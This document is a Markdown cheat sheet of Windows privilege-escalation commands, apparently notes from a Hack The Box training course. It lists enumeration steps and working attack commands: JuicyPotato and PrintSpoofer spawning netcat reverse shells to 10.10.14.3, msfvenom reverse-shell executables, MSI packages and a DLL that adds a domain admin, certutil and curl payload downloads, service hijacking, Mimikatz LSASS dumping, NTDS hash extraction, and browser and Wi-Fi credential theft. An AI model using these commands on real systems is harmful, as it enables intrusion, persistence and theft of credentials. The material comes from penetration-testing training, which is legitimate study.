# Windows Privesc

## Initial Enumeration

| Command | Description |
| --- | --- |
| `xfreerdp /v:<target ip> /u:htb-student` | RDP to lab target |
| `ipconfig /all` | Get interface, IP address and DNS information |
| `arp -a` | Review ARP table |
| `route print` | Review routing table |
| `Get-MpComputerStatus` | Check Windows Defender status |
| `Get-AppLockerPolicy -Effective \| select -ExpandProperty RuleCollections` | List AppLocker rules |
| `Get-AppLockerPolicy -Local \| Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone` | Test AppLocker policy |
| `set` | Display all environment variables |
| `systeminfo` | View detailed system configuration information |
| `wmic qfe` | Get patches and updates |
| `wmic product get name` | Get installed programs |
| `tasklist /svc` | Display running processes |
| `query user` | Get logged-in users |
| `echo %USERNAME%` | Get current user |
| `whoami /priv` | View current user privileges |
| `whoami /groups` | View current user group information |
| `net user` | Get all system users |
| `net localgroup` | Get all system groups |
| `net localgroup administrators` | View details about a group |
| `net accounts` | Get password policy |
| `netstat -ano` | Display active network connections |
| `pipelist.exe /accepteula` | List named pipes |
| `gci \\.\pipe\` | List named pipes with PowerShell |
| `accesschk.exe /accepteula \\.\Pipe\lsass -v` | Review permissions on a named pipe |
## Handy Commands

| Command | Description |
| --- | --- |
| `mssqlclient.py sql_dev@10.129.43.30 -windows-auth` | Connect using mssqlclient.py |
| `enable_xp_cmdshell` | Enable xp_cmdshell with mssqlclient.py |
| `xp_cmdshell whoami` | Run OS commands with xp_cmdshell |
| `c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 443 -e cmd.exe" -t *` | Escalate privileges with JuicyPotato |
| `c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"` | Escalating privileges with PrintSpoofer |
| `procdump.exe -accepteula -ma lsass.exe lsass.dmp` | Take memory dump with ProcDump |
| `sekurlsa::minidump lsass.dmp` and `sekurlsa::logonpasswords` | Use Mimikatz to extract credentials from LSASS memory dump |
| `dir /q C:\backups\wwwroot\web.config` | Checking ownership of a file |
| `takeown /f C:\backups\wwwroot\web.config` | Taking ownership of a file |
| `Get-ChildItem -Path 'C:\backups\wwwroot\web.config' \| select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}` | Confirming changed ownership of a file |
| `icacls "C:\backups\wwwroot\web.config" /grant htb-student:F` | Modifying a file ACL |
| `secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL` | Extract hashes with secretsdump.py |
| `robocopy /B E:\Windows\NTDS .\ntds ntds.dit` | Copy files with ROBOCOPY |
| `wevtutil qe Security /rd:true /f:text \| Select-String "/user"` | Searching security event logs |
| `wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 \| findstr "/user"` | Passing credentials to wevtutil |
| `Get-WinEvent -LogName security \| where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*' } \| Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}` | Searching event logs with PowerShell |
| `msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll` | Generate malicious DLL |
| `dnscmd.exe /config /serverlevelplugindll adduser.dll` | Loading a custom DLL with dnscmd |
| `wmic useraccount where name="netadm" get sid` | Finding a user's SID |
| `sc.exe sdshow DNS` | Checking permissions on DNS service |
| `sc stop dns` | Stopping a service |
| `sc start dns` | Starting a service |
| `reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters` | Querying a registry key |
| `reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll` | Deleting a registry value |
| `sc query dns` | Checking a service status |
| `Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local` | Disabling the global query block list |
| `Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3` | Adding a WPAD record |
| `cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp` | Compile with cl.exe |
| `reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"` | Add reference to a driver (1) |
| `reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1` | Add reference to a driver (2) |
| `.\DriverView.exe /stext drivers.txt` and `cat drivers.txt \| Select-String -pattern Capcom` | Check if driver is loaded |
| `EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys` | Using EoPLoadDriver |
| `c:\Tools\PsService.exe security AppReadiness` | Checking service permissions with PsService |
| `sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"` | Modifying a service binary path |
| `REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA` | Confirming UAC is enabled |
| `REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin` | Checking UAC level |
| `[environment]::OSVersion.Version` | Checking Windows version |
| `cmd /c echo %PATH%` | Reviewing PATH variable |
| `curl http://10.10.14.3:8080/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll"` | Downloading file with cURL in PowerShell |
| `rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll` | Executing custom DLL with rundll32.exe |
| `.\SharpUp.exe audit` | Running SharpUp |
| `icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"` | Checking permissions on a service binary with icacls |
| `cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"` | Replace a service binary |
| `wmic service get name,displayname,pathname,startmode \| findstr /i "auto" \| findstr /i /v "c:\windows\\" \| findstr /i /v """` | Searching for unquoted service paths |
| `accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services` | Checking for weak service ACLs in the Registry |
| `Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"` | Changing ImagePath with PowerShell |
| `Get-CimInstance Win32_StartupCommand \| select Name, command, Location, User \| fl` | Check startup programs |
| `msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe` | Generating a malicious binary |
| `get-process -Id 3324` | Enumerating a process ID with PowerShell |
| `get-service \| ? {$_.DisplayName -like 'Druva*'}` | Enumerate a running service by name with PowerShell |
## Credential Theft

| Command | Description |
| --- | --- |
| `findstr /SIM /C:"password" *.txt *ini *.cfg *.config *.xml` | Search for files with the phrase "password" |
| `gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' \| Select-String password` | Searching for passwords in Chrome dictionary files |
| `(Get-PSReadLineOption).HistorySavePath` | Confirm PowerShell history save path |
| `gc (Get-PSReadLineOption).HistorySavePath` | Reading PowerShell history file |
| `$credential = Import-Clixml -Path 'C:\scripts\pass.xml'` | Decrypting PowerShell credentials |
| `cd c:\Users\htb-student\Documents & findstr /SI /M "password" *.xml *.ini *.txt` | Searching file contents for a string |
| `findstr /si password *.xml *.ini *.txt *.config` | Searching file contents for a string |
| `findstr /spin "password" *.*` | Searching file contents for a string |
| `select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password` | Search file contents with PowerShell |
| `dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*` | Search for file extensions |
| `where /R C:\ *.config` | Search for file extensions |
| `Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore` | Search for file extensions using PowerShell |
| `cmdkey /list` | List saved credentials |
| `.\SharpChrome.exe logins /unprotect` | Retrieve saved Chrome credentials |
| `.\lazagne.exe -h` | View LaZagne help menu |
| `.\lazagne.exe all` | Run all LaZagne modules |
| `Invoke-SessionGopher -Target WINLPE-SRV01` | Running SessionGopher |
| `netsh wlan show profile` | View saved wireless networks |
| `netsh wlan show profile ilfreight_corp key=clear` | Retrieve saved wireless passwords |
## Other Commands

| Command | Description |
| --- | --- |
| `certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat` | Transfer file with certutil |
| `certutil -encode file1 encodedfile` | Encode file with certutil |
| `certutil -decode encodedfile file2` | Decode file with certutil |
| `reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer` | Query for AlwaysInstallElevated registry key (1) |
| `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer` | Query for AlwaysInstallElevated registry key (2) |
| `msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi` | Generate a malicious MSI package |
| `msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart` | Executing an MSI package from the command line |
| `schtasks /query /fo LIST /v` | Enumerate scheduled tasks |
| `Get-ScheduledTask \| select TaskName,State` | Enumerate scheduled tasks with PowerShell |
| `.\accesschk64.exe /accepteula -s -d C:\Scripts\` | Check permissions on a directory |
| `Get-LocalUser` | Check local user description field |
| `Get-WmiObject -Class Win32_OperatingSystem \| select Description` | Enumerate computer description field |
| `guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmd` | Mount VMDK on Linux |
| `guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1` | Mount VHD/VHDX on Linux |
| `sudo python2.7 windows-exploit-suggester.py --update` | Update Windows Exploit Suggester database |
| `python2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt` | Running Windows Exploit Suggester |